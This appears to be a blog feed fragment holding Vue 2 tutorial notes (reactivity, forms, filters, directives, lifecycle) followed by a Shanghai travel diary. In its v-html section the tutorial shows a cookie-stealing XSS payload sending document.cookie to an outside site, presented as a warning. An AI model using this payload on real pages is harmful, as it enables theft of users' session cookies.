    3. 虚拟 DOM 与批量更新

    Vue 使用虚拟 DOM 结合异步队列优化更新流程:

    • 当数据变化时,setter 通知依赖更新,但不会立即更新 DOM。
    • Vue 会将更新操作放入队列中,并在下一个事件循环中批量更新,避免频繁的 DOM 操作。

    4. 响应式原理的应用

    响应式系统支持以下特性:

    • 双向绑定:通过 v-model 实现表单与数据的同步。
    • 计算属性:基于依赖的变化自动计算。
    • 侦听器:通过 watch 监控特定数据的变化并执行回调。

    总结

    Vue 的响应式系统通过以下机制协作:

    1. 使用数据劫持技术(Vue 2:Object.defineProperty,Vue 3:Proxy)。
    2. 实现依赖收集和发布订阅模式。
    3. 结合虚拟 DOM 和异步更新队列,确保性能和开发体验。

    这种设计不仅高效,而且为开发者屏蔽了复杂性,使得数据绑定和状态管理变得直观。

    035 Vue.set() 方法

    ​**一个属性必须有 get()set() 才能被 Vue 跟踪到!**如果要给 data 中的一个对象加一个属性,可以使用 Vue.set() 来实现(这样才会有 get()set()):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    <div id="root">
    <h1>学生信息</h1>
    <button @click="addSex">添加一个性别属性,默认值是男</button>
    <h2>姓名:{{student.name}}</h2>
    <h2 v-if="student.sex">性别:{{student.sex}}</h2>
    <h2>年龄:真实{{student.age.rAge}},对外{{student.age.sAge}}</h2>
    <h2>朋友们</h2>
    <ul>
    <li v-for="(f, index) in student.friends" :key="index">
    {{f.name}}-{{f.age}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    student: {
    name: 'tom',
    age: {
    rAge: 40,
    sAge: 29,
    },
    friends: [
    {name: 'jerry', age: 35},
    {name: 'tony', age: 36}
    ]
    }
    },
    methods: {
    addSex() {
    // Vue.set(this.student, 'sex', '男')
    this.$set(this.student, 'sex', '男')
    }
    }
    })
    </script>

    036 Vue 检测数据的原理_数组

    ​直接操作数组的索引值将不跟踪!Vue 只有在使用数组有关的下列函数,才会检测到数组被改变,从而跟踪到(用到了包装技术):

    在 Vue 2 中,数组的更新检测是有限制的。由于 JavaScript 的数组特性,Vue 无法侦听某些直接的数组操作,因此提供了一些内置的方法来实现响应式更新。这些方法对 Vue 2 的响应式系统进行了增强,确保数据变更能被正确地检测到和响应。

    Vue 2 对数组的更新检测提供了以下七个方法,这些方法都是对原生数组方法的包装:


    1. push()

    • 功能:向数组末尾添加一个或多个元素。

    • 触发更新:响应式地添加新元素并触发视图更新。

      1
      2
      3
      4
      5
      6
      7
      let vm = new Vue({
      data: {
      items: [1, 2, 3]
      }
      });

      vm.items.push(4); // 响应式更新视图

    2. pop()

    • 功能:移除数组末尾的元素。
    • 触发更新:响应式地移除最后一个元素并触发视图更新。
      1
      vm.items.pop(); // 移除 3,视图更新

    3. shift()

    • 功能:移除数组开头的元素。
    • 触发更新:响应式地移除第一个元素并触发视图更新。
      1
      vm.items.shift(); // 移除 1,视图更新

    4. unshift()

    • 功能:向数组开头添加一个或多个元素。
    • 触发更新:响应式地在开头添加新元素并触发视图更新。
      1
      vm.items.unshift(0); // 添加 0,视图更新

    5. splice()

    • 功能:添加、替换或删除数组中的元素。
    • 触发更新:响应式地修改数组并触发视图更新。
      1
      vm.items.splice(1, 1, 'a'); // 替换索引 1 的元素为 'a'

    6. sort()

    • 功能:对数组进行排序。
    • 触发更新:响应式地对数组排序并触发视图更新。
      1
      vm.items.sort(); // 按字典序排序,视图更新

    7. reverse()

    • 功能:反转数组顺序。
    • 触发更新:响应式地反转数组并触发视图更新。
      1
      vm.items.reverse(); // 反转数组顺序,视图更新

    注意事项

    1. 对数组的直接索引赋值不会触发更新

      • Vue 2 无法侦测类似 vm.items[0] = 10 这样的操作。
      • 解决办法:使用 Vue.set()
        1
        Vue.set(vm.items, 0, 10); // 响应式更新索引 0 的值
    2. 数组长度的直接修改不会触发更新

      • 类似 vm.items.length = 2 的操作不会触发响应式更新。
      • 避免直接修改数组长度。

    通过这些方法,Vue 2 能够对数组的变更进行有效的监听,并自动触发相关的视图更新。这种响应式机制是 Vue 2 的核心功能之一。

    ​也可用 Vue.set() 改变数组的值来更新数组。

    1
    Vue.set(vm._data.student.hobby, 1, '打台球')

    037 总结 Vue 监视数据

    ​Vue 监视数据的原理:

    1. Vue 会监视 data 中所有层次的数据;

    2. 如何监测对象中的数据?

      通过 setter 实现监视,且要在 new Vue 时就传入要监测的数据。

      • 对象中后追加的属性,Vue 默认不做响应式处理
      • 如需给后添加的属性做响应式,请使用如下 API:
        • Vue.set(target, propertyName/index, value)
        • wm.$set(target, propertyName/index, value)
    3. 如何监测数组中的数据?

      通过包裹数组更新元素的方法实现,本质就是做了两件事:

      • 调用原生对应的方法对数组进行更新。
      • 重新解析模板,进而更新页面。
    4. 在 Vue 修改数组中的某个元素一定要用如下方法:

      • 使用这些 API:push()pop()shift()unshift()splice()sort()reverse()
      • Vue.set()vm.$set()

    ​特别注意:Vue.set()vm.$set() 不能给 vmvm根数据对象添加属性!


    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    <div id="root">
    <h1>学生信息</h1>
    <button @click="student.age++">年龄 +1 岁</button><br>
    <button @click="addSex">添加性别属性,默认值:男</button><br>
    <button @click="student.sex = '未知'">修改性别</button><br>
    <button @click="addFriend">在列表首位添加一个朋友</button><br>
    <button @click="updateFirstFriendName">修改第一个朋友的名字为:张三</button><br>
    <button @click="addHobby">添加一个爱好</button><br>
    <button @click="updateHobby">修改第一个爱好为:开车</button><br>
    <button @click="removeSmoke">过滤掉爱好中的抽烟</button><br>
    <h3>姓名:{{student.name}}</h3>
    <h3>年龄:{{student.age}}</h3>
    <h3 v-if="student.sex">性别:{{student.sex}}</h3>
    <h3>爱好:</h3>
    <ul>
    <li v-for="(h, index) in student.hobby" :key="index">
    {{h}}
    </li>
    </ul>
    <h3>朋友们:</h3>
    <ul>
    <li v-for="(f, index) in student.friends" :keys="index">
    {{f.name}}--{{f.age}}
    </li>
    </ul>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    student: {
    name: 'tom',
    age: 18,
    hobby: ['抽烟', '喝酒', '烫头'],
    friends: [
    {name: 'jerry', age: 35},
    {name: 'tony', age: 36}
    ]
    }
    },
    methods: {
    addSex() {
    this.$set(this.student, 'sex', '男')
    },
    addFriend() {
    this.student.friends.unshift({name: 'mike', age: 18})
    },
    updateFirstFriendName() {
    this.student.friends[0].name = '张三'
    },
    addHobby() {
    this.student.hobby.push('打台球')
    },
    updateHobby() {
    this.$set(this.student.hobby, 0, '开车')
    },
    removeSmoke() {
    this.student.hobby = this.student.hobby.filter((h)=>{
    return h !== '抽烟'
    })
    }
    }
    })
    </script>

    十三、收集表单数据

    038 收集表单数据

    收集表单数据:
    若:<tnput type="text"/>,则 v-model 收集的是 value 值,用户输入的就是 value 值。
    若:<input type="radio"/>,则 v-model 收集的是 value 值,且要给标签配置 value 值。
    若:<input type="checkbox"/>

    1. 没有配置 inputvalue 属性,那么收集的就是 checked(勾选 or 未勾选,是布尔值)
    2. 配置 inputvalue 属性:
      • v-model 的初始值是非数组,那么收集的就是 checked(勾选 or 未勾选,是布尔值)
      • v-model 的初始值是数组,那么收集的的就是 value 组成的数组

    备注:v-model 的三个修饰符:

    • lazy:失去焦点再收集数据
    • number:输入字符串转为有效的数字
    • trim:输入首尾空格过滤

    ​代码:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    <div id="root">
    <form @submit="demo">
    <label for="account">账号:</label><input type="text" id="account" v-model.trim="account"><br><br>
    <label for="password">密码:</label><input type="password" id="password" v-model="password"><br><br>
    <label for="number">年龄:</label><input type="number" id="age" v-model.number="age"><br><br>
    性别:
    <input type="radio" name="sex" v-model="sex" value="male">
    <input type="radio" name="sex" v-model="sex" value="female"><br><br>
    爱好:
    学习<input type="checkbox" v-model="hobby" value="study">
    打游戏<input type="checkbox" v-model="hobby" value="play">
    吃饭<input type="checkbox" v-model="hobby" value="eat"><br><br>
    所属校区
    <select v-model="city">
    <option value="">请选择校区</option>
    <option value="beijing">北京</option>
    <option value="shanghai">上海</option>
    <option value="shenzhen">深圳</option>
    <option value="wuhan">武汉</option>
    </select><br><br>
    其他信息:
    <textarea v-model.lazy="others"></textarea><br><br>
    <input type="checkbox" v-model="agree">阅读并接受<a href="www.baidu.com">《用户协议》</a><br><br>
    <button type="submit">提交</button>
    </form>

    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    account: '',
    password: '',
    age: '',
    sex: 'male',
    hobby: [],
    city: 'wuhan',
    others: '',
    agree: ''
    },
    methods: {
    demo() {
    alert("提交数据" + JSON.stringify(this._data))
    }
    }
    })
    </script>

    ​使用 <form> 语句建立一个表单,@submit="demo" 表示提交这个表单时将执行 demo() 函数。

    名称实现备注
    账号<label for="account">账号:</label><input type="text" id="account" v-model.trim="account"><label> 下的 for 将绑定下面的 <input>,使得点击提示文本也会让输入框高亮;
    .trim 表示移除首尾的空格。
    密码<label for="password">密码:</label><input type="password" id="password" v-model="password">type="password" 表示以密码的形式接受输入。
    年龄<label for="number">年龄:</label><input type="number" id="age" v-model.number="age">type="number" 表示接受数字作为输入;
    v-model.number="age" 表示接受的输入将转义成数字(而不是字符串)。
    性别男<input type="radio" name="sex" v-model="sex" value="male">
    女<input type="radio" name="sex" v-model="sex" value="female">
    name="sex" 可以实现单选的选择框;
    value="male"value="female" 可以控制选择选择框时提交的值。
    爱好学习<input type="checkbox" v-model="hobby" value="study">
    打游戏<input type="checkbox" v-model="hobby" value="play">
    吃饭<input type="checkbox" v-model="hobby" value="eat">
    v._data.hobby 初始化时应设成数组,这样才可以多选。
    所属校区<select v-model="city">
    <option value="">请选择校区</option>
    <option value="beijing">北京</option>
    <option value="shanghai">上海</option>
    <option value="shenzhen">深圳</option>
    <option value="wuhan">武汉</option>
    </select>
    选中某个值时会替换。
    其他校区<textarea v-model.lazy="others"></textarea><br/><br/>v-model.lazy 当注意点切换时,Vue 才会更新里面的值,从而提升性能。
    阅读并接受<input type="checkbox" v-model="agree">阅读并接受<a href="www.baidu.com">《用户协议》</a>默认的 type="checkbox",选中返回 true,没选中返回 false
    提交<button type="submit">提交</button>type="submit" 可加可不加,因为 <form> 默认第一个 <button> 按下后将会提交表单。

    webp

    十四、过滤器

    039 过滤器

    过滤器:

    定义:对要显示的数据进行特定格式化后再显示(适用于一些简单逻辑的处理,复杂的还是 computedmethods

    语法:

    1. 注册过滤器:Vue.filter(name,callback)(局部) 或 new Vue{filters:{}}(全局)
    2. 使用过滤器:{{xxx |过滤器名}}v-bind:属性 ="xxx | 过滤器名”

    备注:

    1. 过滤器也可以接收额外参数、多个过滤器也可以串联
    2. 并没有改变原本的数据,是产生新的对应的数据

    ​从 BootCDN - Bootstrap 中文网开源项目免费 CDN 加速服务 铂特优选 处可以找到常用的 js 库。这里整一个 day.min.js

    ​操作一下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    <div id="root">
    <h2>显示格式化后的时间</h2>
    <!-- 计算属性实现 -->
    <h3>现在是:{{fmtTime}}</h3>
    <!-- methods 实现 -->
    <h3>现在是:{{getFmtTime()}}</h3>
    <!-- 过滤器实现 -->
    <h3>现在是:{{time | timeFormater}}</h3>
    <!-- 过滤器实现(传参) -->
    <h3>现在是:{{time | timeFormater('YYYY-MM-DD') | mySlice}}</h3>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    time: 1731817795096
    },
    computed: {
    fmtTime() {
    return dayjs(this.time).format('YYYY-MM-DD HH:mm:ss')
    }
    },
    methods: {
    getFmtTime() {
    return dayjs(this.time).format('YYYY-MM-DD HH:mm:ss')
    }
    },
    filters: {
    timeFormater(value, format='YYYY-MM-DD HH:mm:ss') {
    return dayjs(value).format(format)
    },
    mySlice(value) {
    return value.slice(0, 4)
    }
    }
    })
    </script>

    十五、内置指令

    040 v-text 指令

    ​下面的代码与将在 <div> 之间生成文本,但是不会渲染结构。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    <div id="root">
    <div v-text="name"></div>
    <div>{{name}}</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: '<h2>古尔丹<h2>'
    }
    })
    </script>

    041 v-html 指令

    v-html 指令:

    1. 作用:向指定节点中消染包含 html 结构的内容。
    2. 与插值语法的区别:
      • v-html 会替换掉节点中所有的内容,{{xx}}v-text 则不会。
      • v-html 可以识别 html 结构。
    3. 严重注意:v-html 有安全性问题!
      • 在网站上动态渲染任意 HTML 是非常危险的,容易导致 XSS 攻击
      • 一定要在可信的内容上使用 v-html永不要用在用户提交的内容上

    ​下面的代码与将在 <div> 之间生成文本,但是渲染结构。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    <div id="root">
    <div v-html="name"></div>
    <div>{{name}}</div>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    name: '<a href=javascript:location.href="http://www.baidu.com?" + document.cookie>点开有惊喜!<a/>'
    }
    })
    </script>

    ​这段代码是危险的,这可能把该网站的 cookie 送给另一个网站中,如果网站的 cookie 中的关键信息没有使用 HttpOnly,可能导致信息泄露!

    webp

    webp

    ​服务器根据 cookie 决定用户是否登录。同样的 cookie 可以登录同样的账户。

    042 v-cloak 指令

    v-cloak 指令(没有值):

    1. 本质是一个特殊属性,Vue 实例创建完毕并接管容器后,会删掉 v-cloak 属性。
    2. 使用 css 配合 v-cloak 可以解决网速慢时页面展示出 {{xxx}} 的问题。
    1
    2
    3
    [v-cloak] {
    display: none;
    }

    043 v-once 指令

    v-once 指令:

    1. v-once 所在节点在初次动态渲染后,就视为静态内容了。
    2. 以后数据的改变不会引起 v-once 所在结构的更新,可以用于优化性能。

    044 v-pre 指令

    v-pre 指令:

    1. 跳过其所在节点的编译过程。
    2. 可利用它跳过:没有使用指令语法、没有使用插值语法的节点,会加快编译。

    十六、自定义指令

    045 自定义指令-函数式 & 046 自定义指令-对象式

    ​使用 directives 创建一个自定义指令:

    directives 下的函数接收两个参数,分别是绑定的真实 DOM 和绑定中传的参数。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    <div id="root">
    <h2>当前的 n 值是:<span v-text="n"></span></h2>
    <!-- 需求 1:定义一个 v-big 指令,和 v-text 功能类似,但会把绑定的数值扩大 10 倍。 -->
    <h2>放大 10 倍后的 n 值是:<span v-big="n"></span></h2>
    <button @click="n++">点我 n + 1</button>
    <hr>
    <!-- 需求 2:定义一个 v-bind 指令,和 v-bind 功能类似,但可以让其所绑定的 input 元素默认获取焦点。 -->
    <input type="text" v-fbind:value="n">
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    n: 1
    },
    directives: {
    // big 函数何时会被调用?
    // 1. 指令与元素成功绑定时(一上来)bind()
    // 2. 指令所在的模板被重新解析时 update()
    big(element, binding) {
    element.innerText = binding.value * 10
    console.log(element, binding)
    },
    fbind: {
    // 指令与元素成功绑定时(一上来)
    bind(element, binding) {
    element.value = binding.value
    },
    // 指令所在元素被插入页面时
    inserted(element, binding) {
    element.focus()
    },
    // 指令所在的模板被重新解析时
    update(element, binding) {
    element.value = binding.value
    }
    }
    }
    })
    </script>

    047 自定义指令-总结

    自定义指令总结:

    1. 定义语法
      • 局部指令:
        • new Vue({directives: {指令名: 配置对象}})
        • new Vue({directives{指令名: 回调函数}})
      • 全局指令:
        • Vue.directive(指令名, 配置对象)
        • Vue.directive(指令名, 回调函数)
    2. 配置对象中常用的 3 个回调:
      • bind:指令与元素成功绑定时调用。
      • inserted:指令所在元素被插入页面时调用。
      • update:指令所在模板结构被重新解析时调用。
    3. 备注:
      • 指令定义时不加 v-,但使用时要加 v-
      • 指令名如果是多个单词,要使用 kebab-case 命名方式,不要用 camelCase 命名。

    十七、生命周期

    049 生命周期-挂载流程

    生命周期:

    1. 又名:生命周期回调函数、生命周期函数、生命周期钩子。
    2. 是什么:Vue 在关键时刻帮我们调用的一些特殊名称的函数。
    3. 生命周期函数的名字不可更改,但函数的具体内容是程序员根据需求编写的。
    4. 生命周期函数中的 this 指向是 vm 或组件实例对象。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    <div id="root">
    <!-- 完整写法:<h2 :style="{opacity: opacity}">欢迎学习 Vue</h2> -->
    <h2 :style="{opacity}">欢迎学习 Vue</h2>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    opacity: 0.75
    },
    // Vue 完成模板的解析并把真实的 DOM 元素放入页面后(挂载完毕)调用 mounted()
    mounted() {
    console.log('mounted', this)
    setInterval(() => {
    this.opacity -= 0.01
    if (this.opacity <= 0)
    this.opacity = 1
    }, 16)
    },
    })
    </script>

    050 生命周期-更新流程 & 051 生命周期-销毁流程

    ​Vue 组件的生命周期大致可以分为三个阶段:创建阶段更新阶段销毁阶段。每个阶段都有一系列的生命周期钩子函数,可以让开发者在这些阶段执行特定的逻辑。

    webp

    052 总结生命周期

    张三的一生(张三的生命周期):

    • 将要出生
    • (重要)呱呱坠地 → 检查身体各项指标。
    • 学会说话
    • 学会走路
    • ……
    • ……
    • (重要)将要永别 → 交代后事
    • 已经永别

    vm 的一生(vm 的生命周期):

    • 将要创建 → 调用 beforecreate()
    • 创建完毕 → 调用 created()
    • 将要挂载 → 调用 beforeMount()
    • (重要)挂载完毕 → 调用 mounted()
    • 将要更新 → 调用 beforeUpdate()
    • 更新完毕 → 调用 updated()
    • (重要)将要销毁 → 调用 beforeDestroy()
    • 销毁完毕 → 调用 destroyed()

    常用的生命周期钩子:

    1. mounted():发送 ajax 请求、启动定时器、绑定自定义事件、订阅消息等【初始化操作】。
    2. beforeDestroy():清除定时器、解绑自定义事件、取消订阅消息等【收尾工作】。

    关于销毁 Vue 实例

    1. 销毁后借助 Vue 开发者工具看不到任何信息。
    2. 销毁后自定义事件会失效,但原生 DOM 事件依然有效。
    3. 一般不会再 beforeDestroy() 操作数据,因为即便操作数据,也不会再触发更新流程了。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    <div id="root">
    <!-- 完整写法:<h2 :style="{opacity: opacity}">欢迎学习 Vue</h2> -->
    <h2 :style="{opacity}">欢迎学习 Vue</h2>
    <button @click="stop">点我停止变换</button>
    </div>
    <script type="text/javascript">
    Vue.config.productionTip = false // 阻止 Vue 在启动时生成生产提示。
    // 创建 Vue 实例
    const v = new Vue({
    el: '#root',
    data: {
    opacity: 0.75
    },
    methods: {
    stop() {
    this.$destroy()
    }
    },
    // Vue 完成模板的解析并把真实的 DOM 元素放入页面后(挂载完毕)调用 mounted()
    mounted() {
    console.log('mounted', this)
    this.timer = setInterval(() => {
    this.opacity -= 0.01
    if (this.opacity <= 0)
    this.opacity = 1
    }, 16)
    },
    beforeDestroy() {
    clearInterval(this.timer) // 销毁 Vue 实例并不会销毁定时器
    },
    })
    </script>
    ]]>
    @@ -247,7 +247,7 @@ /posts/Diary-%E6%B2%AA%E4%BA%86%EF%BC%88%E4%BA%8C%EF%BC%89/ - 前言
            

    ​这是上海之旅的下半程!

    正文

    11.6

    07:55 滴水湖

    浦东新区の新区

    ​又是早早醒来出门了。人民广场-2 号线-龙阳路-16 号线-滴水湖,¥10。历时一个半小时,按时间来说坐高铁的话应该都可以到拙政园了😇。

    ​这地方跟雄安新区可像,周围基本都是沪 C 的车牌了。

    长江-1000

    ​“CJ-1000A” 发动机是我国第一款商用航空发动机产品,是装配国产大飞机的惟一国产动力。 取名 “长江” 寓意大客发动机 CJ-1000A 产品研制开创中国商用航空发动机产业发展先河,象征着中国商用航空发动机的无穷动力和源远流长。 “1000” ,代表发动机推力等级在 10000~1999kgf ,“A” 是第一型产品代号。

    大圆湖

    ​为了造一个“新区”,有个策略是挖一个大湖以形成一个美丽的人造景观。据房地产开发商说 50 年后这里就会变成上海市中心了!

    08:12 上海天文馆🤩

    据说是全上海最难约的馆

    ​即使是这么远,依旧有很多人。

    12:07 进城

    上海小别墅

    ​看完天文馆该进城了。滴水湖-16 号线-龙阳路-2 号线-世纪公园(其实坐过站了),¥9。这一片让我感觉即使是上海,还是有大片的地块是没有开发的。

    13:44 浦东 11 路

    奇葩路名

    ​想着到浦东了,重点是去看陆家嘴,在这之前可以再去看看上海动漫博物馆。

    ​梅花路海桐路-浦东 11 路-张江路祖冲之路,¥2。新区的车站名和路名总是这么的奇葩……

    13:48 上海动漫博物馆🤩

    张江戏剧谷

    ​虽然这个场馆没有中国动漫博物馆来的大,但是我觉得里面介绍的范围要比后者来的广。

    15:05 陆家嘴🤩

    上海著名建筑

    ​东方明珠广播电视塔,简称“东方明珠”,位于上海市浦东新区陆家嘴世纪大道 1 号,地处黄浦江畔,背拥陆家嘴地区现代化建筑楼群,与隔江的外滩万国建筑博览群交相辉映,1991 年 7 月 30 日动工建造,1994 年 10 月 1 日建成投入使用,是集都市观光、时尚餐饮、购物娱乐、历史陈列、浦江游览、会展演出、广播电视发射等多功能于一体的上海市标志性建筑之一。

    ​蹬个共享单车,然后广兰路-2 号线-陆家嘴。

    ​陆家嘴,到了,开左侧门。We are arriving at Lujiazui Station.(此处背景音乐 duang~duang~duang~)

    三件套

    ​调整一下视角,让注射器位于开瓶器和打蛋器中间的位置。

    ​上海环球金融中心占地面积 14400 平方米,总建筑面积 381600 平方米,拥有地上 101 层、地下 3 层 ,楼高 492 米,外观为正方形柱体。裙房为地上 4 层,高度约为 15.8 米。上海环球金融中心 B2、B1、2 和 3 层为商场、餐厅;7-77 层为办公区域(其中 29 层为环球金融文化传播中心);79-93 层为酒店;94、97 和 100 层为观光厅。

    ​上海金茂大厦占地面积 2.4 万平方米,总建筑面积 29 万平方米,其中主楼 88 层,高度 420.5 米,约有 20 万平方米,建筑外观属塔型建筑。裙房共 6 层 3.2 万平方米,地下 3 层 5.7 万平方米,外体由铝合金管制成的格子包层。金茂大厦 1-2 层为门厅大堂;3-50层是层高 4 米,净高 2.7 米的大空间无柱办公区;51-52 层为机电设备层;53-87 层为酒店;88 层为观光大厅,建筑面积 1520 平方米。

    ​上海中心大厦主要用途为办公、酒店、商业、观光等公共设施;主楼为地上 127 层,建筑高度 632 米,地下室有 5 层;裙楼共 7 层,其中地上 5 层,地下 2 层,建筑高度为 38 米;总建筑面积约为 57.8 万平方米,其中地上总面积约 41 万平方米,地下总面积约 16.8 万平方米,占地面积 30368 平方米。

    世纪大道

    ​看了看网红的三件套高手位有点远,于是我决定 give up!去看一个有意思的地方。

    迪士尼旗舰店

    各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具 各色玩具

    各色玩具

    见到祖宗了

    ​里面有我最喜欢的动漫人物!而且价格惊人🤧,原产地也就广东东莞,居然还是排队咔咔买,有钱の上海人。

    上海欢迎您!

    上海海洋水族馆

    ​14 年前曾到此一游!

    15:47 渡江

    望浦西

    坐个船船!

    ​腿去东昌路码头,送你回外滩码头!¥2。

    望浦东

    船头

    16:13 外滩-福州路🤩

    外滩 外滩 外滩

    外滩

    ​白天的外滩也别有一番风景!

    外滩牛

    ​外滩“金融牛”是美籍意大利裔著名雕塑家阿图罗·迪·莫迪卡(Arturo Di Modica)于 2010 年在上海世博会开幕之际为外滩金融广场设计创作的。

    开始 city walk 福州路!

    ​上海租界自西向东有几条重要的道路:Nankin Road、Kiukiang Road、Hankow Road、Foochow Road 和 Canton Road。中文名分别是南京路、九江路、汉口路、福州路和广东路(本来是广州路的,但是广东和广州的英文名是一样的,就传跑偏了)。南京路老外为了纪念《南京条约》签订而命名的,其他几条路的地名也是要么设租界、要么设海关的地方。

    ​身为福州人,我选择走一走福州路!

    逛一逛这条路
    老上海著名妓院一条路
    福州路 福州路

    福州路

    福州大楼
    福州大楼

    福州大楼

    ​福州大楼原名汉弥尔登大楼,1931 年开工,1933 年竣工。此楼分主楼和辅楼,辅楼称老大楼,六层,大门在福州路上,与主楼相连。主楼即新大楼,建筑面积 12294 平方米,公和洋行设计,新仁记营造厂施工。造型与风格乃是准现代派,中部 14 层,两翼 7-9 层。外观中凹,立面上多笔直的线条,看去简洁不紊,仅大门上顶层和塔楼有备案,属装饰艺术派。窗框除二楼和顶层正中三扇为卷形,余皆长方格形。大门用转门,门前上有两棚。底层外墙为花岗石,2 至 14 层为白水泥人造石。内部房间、走道、卫生间分别为硬木、人造大理石及马赛克地坪,大楼一部分为写字间出租,也有 66 套公寓客房以及停车间等。

    杏花楼

    外文书店
    外文书店

    外文书店

    ​当我高分考过六级后自以为英语水平应该不错了,于是自不量力地去外文书店整了本介绍外滩的英文书,£19.95,价格惊人相当于¥200😅,然而里面的内容还是看得不太懂,只能看着图片知道大概意思。

    福建福州

    ​这是福建中路和福州路的交叉口!

    666

    ​这是福州路 666 号!

    上海市基督教教务委员会

    17:27 黄河路

    开躺!

    ​这天的行程结束了!

    ​香迷糊的国际饭店蝴蝶酥让我念念不忘,上网查了下可以去哈尔滨食品厂买个替代品,也可以叫奥乐齐超市的外卖,这样就可以规避贪吃蛇排队了!

    11.7

    06:39 煎饼果子

    药药切克闹

    ​看手法就觉得没有河北保定煎得流畅,但味道还蛮好的🤧。

    07:09 静安寺🤩

    静安寺

    ​静安寺,又称静安古寺,位于上海市静安区,其历史相传最早可追溯至三国孙吴赤乌十年(247 年),初名沪渎重元(玄)寺。宋大中祥符元年(1008 年),更名静安寺。南宋嘉定九年(1216 年),寺从吴淞江畔迁入境内芦浦沸井浜边(今南京西路),早于上海建城。静安寺总建筑面积达 2.2 万平方米,整个庙宇形成前寺后塔的格局,由大雄宝殿、天王殿、三圣殿三座主要建筑构成,是上海最古老的佛寺。寺内藏有八大山人名画、文征明真迹《琵琶行》行草长卷。静安区亦由静安寺而闻名于世。静安寺的建筑风格是仿明代以前的建筑风格,典型的代表就是斗拱的形制。

    静安寺 静安寺

    多少楼台烟雨中

    ​据说是全中国最贵的寺庙,里面遍是黄金白银!进去要¥50,于是我决定就在外面转一转好了。

    狮子 狮子

    左右门神

    奇特建筑 奇特建筑

    不知道叫啥建筑

    07:58 光启南路

    光启南路 光启南路 光启南路

    上海老破小

    ​静安寺-7 号线-肇嘉浜路-9 号线-小南门,¥4。本来导航更推荐我 2 号线-世纪大道-9 号线-小南门,我看了下还得过江看着就蠢,于是我选择前者路线。

    ​还记得 14 年前住的地方叫做天意旅馆,位于复兴东路路口,光启南路内。故地重逢一下,全部拆迁了😷。

    08:13 城隍庙-豫园🤩

    城隍庙

    ​要走的时候再来看一看老上海吧!

    打蛋器下

    施工中

    ​¥10。结果看了个建筑工地🤧。里面基本都是老上海在拜拜拜?

    霍光大将军

    妈祖

    ​原来上海人也拜妈祖耶。

    豫园商城 豫园商城 豫园商城 豫园商城

    豫园商城

    ​进豫园需要¥40,下次一定,简单地在旁边的商城里逛个街吧。

    豫园地铁站

    ​该坐地铁回去了!这个地铁站让我觉得 14 年前坐地铁时就是这个站,当时年幼的我看到这花里胡哨的玩意直接傻了😵,后面家里人根本不敢做地铁,靠打车解决交通问题。

    ​豫园-14 号线-大世界-8 号线-人民广场,¥3。

    09:24 上海历史博物馆🤩

    跑马总会大楼

    ​上海市历史博物馆(上海革命历史博物馆),国家一级博物馆,位于上海市黄浦区南京西路 325 号(原上海美术馆),地处上海人民广场历史风貌保护区, 人民公园西侧,占地 10000 平方米,是全面综合反映上海 6000 年悠久地方历史及革命历史的地志性博物馆。

    ​趁还有一点点时间,再玩一个地方!

    ​一个比较冷门的博物馆,介绍着上海的历史(主要就是近代史了)。上海这个地方居然能有 6000 年的历史?

    西楼

    10:47 午饭

    排骨年糕+罗宋汤

